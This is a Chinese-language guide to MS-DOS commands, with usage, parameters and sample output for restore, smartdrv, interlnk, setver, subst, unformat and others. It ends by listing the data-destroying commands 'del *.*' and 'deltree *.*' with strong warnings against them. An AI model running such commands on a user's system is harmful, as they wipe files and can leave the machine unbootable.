prompt $e 表示Esc代表的字元 prompt $_ 表示回車換行
〔例 子〕 C:\DOS>prompt wang$g� 將wang>作為提示符
WANG>prompt $t$d$g� 使用時間、日期和>號做為提示符
0:01:07.77Thu 08-29-1996>prompt $p$g�
C:\DOS>
restore 恢復已備份的文件
〔建 議〕 如果以前用backup做過文件備份,則當原文件損壞時可以用它來恢復
文件。
將用backup命令備份的磁碟中的文件恢復到另一磁碟中,備份磁碟中
應有backup.00X和control.00X這兩條文件。
〔用 法〕 restore [備份盤符] [目標盤符]
將備份盤上備份文件恢復到指定盤上
restore /s 將備份文件包括子目錄都恢復到指定盤上
restore /p 讓用戶判斷是否恢復文件
restore /b:日期 恢復日期以前的文件
restore /a:日期 恢復日期之後的文件
restore /l:時間 恢復時間之前的文件
restore /e:時間 恢復時間之後的文件
restore /m 只恢復上次備份後修改過的文件
restore /n 只恢復上次備份後已刪 除的文件
restore /d 只顯示要恢復的文件名
〔例 子〕 C:\DOS>restore a: c:�
Insert backup diskette 01 in drive A:
Press any key to continue . . .
在A驅中放入第一張備份盤,按任意鍵即可,恢復完第一張後,按順
序放入其它盤即可。
當您用上述命令不能正確恢復文件時請用:
C:\DOS>restore a: c:\ /s
time|set|smartdrv
time 顯示及修改時間
〔適用場合〕 用於顯示及修改時間,用法同date
〔例 子〕 C:\DOS>time�
Current time is 12:15:26.04a
Enter new time: 11:20:20.00p
按時:分順序輸入時間,再加上下午(a/p)即可 直接按ENTER鍵可忽略
修改時間。
set 設置環境變數
〔適用場合〕 設置音效卡和路徑等時用到
〔用 法〕 set [環境變數]=[字元串]
這條命令常常用在autoexec.bat中
〔例 子〕 C:\>set blaster=a220 i5 d1 設置音效卡的參數
C:\>set path=c:\dos path c:\dos含義相同
smartdrv 設置磁碟加速器
〔建 議〕 它可以提高硬碟訪問速度,最好在autoexec.bat文件中載入吧。
〔用 法〕 smartdrv /x
執行並駐留內存,開辟磁碟加速緩存區,並屏蔽所有驅動器緩存,是
較常用的方法(一般用這個命令就夠了)
smartdrv /c 將緩存內的信息都寫入硬碟
smartdrv /e: 數字 設置一次移動的信息量
smartdrv /b: 數字 設置預先讀取的緩沖區大小
append|debug|diskcomp
append 設置非執行文件的路徑
〔適用場合〕 當您無法在多個目錄中尋找到自己輸入的文稿時,可以試一試這個命
令,用法類似path。
〔用 法〕 append [路徑];[路徑]
〔例 子〕 C:\>append c:\test�
設置尋找非可執行文件路徑為c:\test如果該目錄下有文件1.txt時,
在其它目錄下調用1.txt找不到時,可自動尋找到c:\test目錄。
D:\UCDOS>edit 1.txt 可找到C:\test\1.txt文件
debug 程序調試命令
〔建 議〕 如果你學過匯編語言,那你應該會使用debug,如果沒學過,最好別
使用
〔用 法〕 debug [文件名]
diskcomp 比較磁碟
〔適用場合〕 比較兩張盤是否相同,沒想到什麼時候會用到,在比較用disk拷
貝的兩張盤,為什麼不用disk/v校驗呢?
〔用 法〕 diskcomp [盤符1] [盤符2] 比較盤1和盤2
diskcomp /1 只比較磁碟的第一面
diskcomp /8 只比較沒磁軌的前8個扇區
〔例 子〕 C:\>diskcomp a: a:
在同一軟碟機中比較兩張盤
Insert FIRST diskette in drive A:
放入第一張盤
Press any key to continue . . .
Comparing 80 tracks 18 sectors per track, 2 side(s)
Insert SECOND diskette in drive A:
放入第二張盤
Press any key to continue . . . Compare OK
比較未發現不同
Compare another diskette (Y/N) ?n
是否比較其它盤,選y繼續比較,選n停止
expand|fasthelp|fc
expand 解壓工具
〔適用場合〕 微軟公司軟體原始安裝盤中有許多後綴以"_"結尾的壓縮文件,可以
用它解壓,解除您因為少數幾個文件丟失造成的麻煩。
〔用 法〕 expand [源文件名] [目的文件]
〔例 子〕 C:\>expand a:vsafe.co_ c:\dos\vsafe.com
� 解壓vsafe.co_為vsafe.com文件
Microsoft (R) File Expansion Utility Version 2.10
Copyright (C) Microsoft Corp 1990-1993. All rights
reserved.
Expanding a:vsafe.co_ to c:\dos\vsafe.com. a:vsafe.co_:
33046 bytes expanded to 62576 bytes, 89% increase.
C:\DOS>
fasthelp 快速顯示幫助信息
〔建 議〕 可以看看所有的命令,對於單個的命令,還不如在命令名後加/?參數
方便
〔用 法〕 fasthelp 列出所有DOS命令的用處
fasthelp [命令名] 顯示命令的用處,等價於 [命令名]/?
fc 文件比較
〔建 議〕 也許對於大多數人是永遠不會用到它的
〔用 法〕 fc [文件名1] [文件名2] 比較兩文件的不同
參數還有: a c l Lbn n t w nnnn
〔例 子〕 C:\TEST>fc a.bat b.bat�
Comparing files A.BAT and B.BAT
***** A.BAT
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag
if errorlevel 2 goto mem
if errotlevel 1 goto end
***** B.BAT choice /c:dme defrag,mem,end
***** C:\TEST>
interlnk|intersvr|qbasic
interlnk 啟動簡易網客戶機
〔適用場合〕 如果有兩台電腦可以通過它和intersvr聯成簡易的網路,這是條很有
用的命令,但不常用
〔用 法〕 DOS新增支持網路的功能,
它可以使兩台電腦通過並口線或串口線相聯組成簡易的網路
使用interlnk 必須在config.sys中增添一句:
device=c:\dos\interlnk
並口線的兩頭都應是25針公接頭,針之間的連接如下圖:對應
p2------------------------p15
p3------------------------p13
p4------------------------p12
p5------------------------p10 公接頭指接頭為帶針的
p6------------------------p11 母接頭指接頭為帶孔的
p15-----------------------p2
p13-----------------------p3
p12-----------------------p4
p10-----------------------p5
p11-----------------------p6
p25-----------------------p25 地線
〔例 子〕 C:\DOS\>interlnk Port-LPT1
this Computer Other Computer
(Client) (Server)
----------------------------------------
E: equals A:
F: equals C:
在客戶機中E盤即為服務機的A盤,F盤為服務機的C盤
intersvr 啟動簡易網伺服器
〔適用場合〕 使用它,電腦就成了伺服器了(只限與DOS提供的簡易網)
〔用 法〕 intersvr 啟動服務機
intersvr /lpt:1 啟動服務機,用lpt1口作為數據傳輸口
intersvr /com:1 啟動服務機,用com1口作為數據傳輸口
參數還有 x baud: b v r (參見interlnk)
〔例 子〕 C:\DOS>intersvr�
qbasic 啟動Basic集成環境
〔建 議〕 也許對於大多數人是永遠不會用到它的
〔用 法〕 如果會qbasic語言,那麼可以利用它編寫自己的程序。edit.com必須
有它才可用。
qbasic 起動basic語言環境
qbasic/editor 以全屏方式編輯語言
參數還有: b g h mbf nohi run
〔例 子〕 C:\DOS>qbasic�
setver|share|subst
setver 設置版本
〔適用場合〕 當希望使用其它版本的dos命令時可以用它來欺騙電腦。在高版本
DOS中,某些舊版本程序需要DOS3.3時,可用setver來設置
〔用 法〕 使用時一般在config.sys中加入 device=setver.exe
setver 顯示文件的版本
setver [文件名] n.nn 設置指定文件的版本號
〔例 子〕 C:\DOS>setver�
KERNEL.EXE 5.00
DOSOAD.SYS 5.00
EDLIN.EXE 5.00
BACKUP.EXE 5.00
ASSIGN.COM 5.00
EXE2BIN.EXE 5.00
JOIN.EXE 5.00
RECOVER.EXE 5.00
WINWORD.EXE 4.10
C:\>
若程序AAA.exe必須在MS-DOS3.3下執行,則鍵入
C:\DOS>setver aaa.exe 3.30�
又如net5.exe僅在MS-DOS5.0下執行,則在config.sys中加入
device=setver.exe後也可在Ms-DOS6.22下運行。
share 文件共享
〔建 議〕 只有在軟體聲明必須要運行它時才用
〔用 法〕 可在config.sys中加入 install=share.exe 也可直接運行
參數有 f l
subst 路徑替換
〔建 議〕 一個非常有趣的命令,如果經常用光碟軟體,可能有用。
〔用 法〕 subst 顯示當前的替代路徑
subst [盤符] [路徑]
將指定的路徑替代盤符,該路徑將作為驅動器使用
subst /b 解除替代
〔例 子〕 C:\DOS>subst a: c:\temp� 用c盤temp目錄替代a盤
C:\>subst a: /d� 解除替代
tree|unformat|vsafe
tree 顯示命令樹結構
〔適用場合〕 查看所有的子目錄
〔用 法〕 tree [盤符] 顯示所有的子目錄樹
tree /f 顯示目錄時同時顯示文件名
tree /a 以ASCII碼顯示目錄樹
〔例 子〕 C:\WINDOWS>tree /a�
unformat 恢復已被格式化的磁碟
〔建 議〕 你把有重要信息的軟盤格式化了?快用unformat……什麼?你用了
format /u,那死定了
〔用 法〕 unformat [盤符] 恢復指定的被格式化的磁碟
unformat /l 顯示unformat所找到的文件名
〔例 子〕 C:\WINDOWS>unformat a:�
vsafe 病毒防護程序
〔建 議〕 把它裝入內存可以隨時檢測出許多種病毒,是比較有用的。
〔用 法〕 vsafe 載入vsafe在內存中
vsafe /u 從內存中去除vsafe
vsafe/ne 將vsafe裝入擴充內存
vsafe/nx 將vsafe裝入擴展內存
參數還有 Ax Cx n d
〔例 子〕 C:\>vsafe
ver|vol|ctty
ver 顯示DOS版本
〔例 子〕 C:\>ver
�MS-DOS Version 6.22
C:\>
vol 顯示指定的磁碟卷標號
〔例 子〕 C:\>vol�
Volume in drive C is Wang
Volume Serial Number is 2116-1DD0
C:\>
ctty 改變控制設備
〔建 議〕 用來改變控制的輸入輸出設備,可以試試這條命令,不過恐怕不會有
什麼作用,是DOS中最沒用的命令之一
〔用 法〕 ctty [設備名] 設置控制台
〔例 子〕 C:\>ctty aux� 設置aux為輸入輸出設備。
del *.* 刪除當前目錄所有文件
〔建 議〕 在C盤根目錄使用del *.*會使電腦找不到滑鼠、光碟機、不能使用
windows,甚至不能啟動。 事實上在任何目錄中使用這條命令,都需
要好好考慮。
deltree *.* 刪除當前目錄下所有目錄與文件
〔建 議〕 在C盤根目錄中使用這條命令,那你必須要保證你的頭腦是清醒的,
而且你保證這樣做是有必要的,但我們認為在任何情況下都不應該這
樣使用這條命令。 在任何目錄下使用deltree *.*都會產生與
del *.*一樣甚至更壞的結果。慎之!慎之!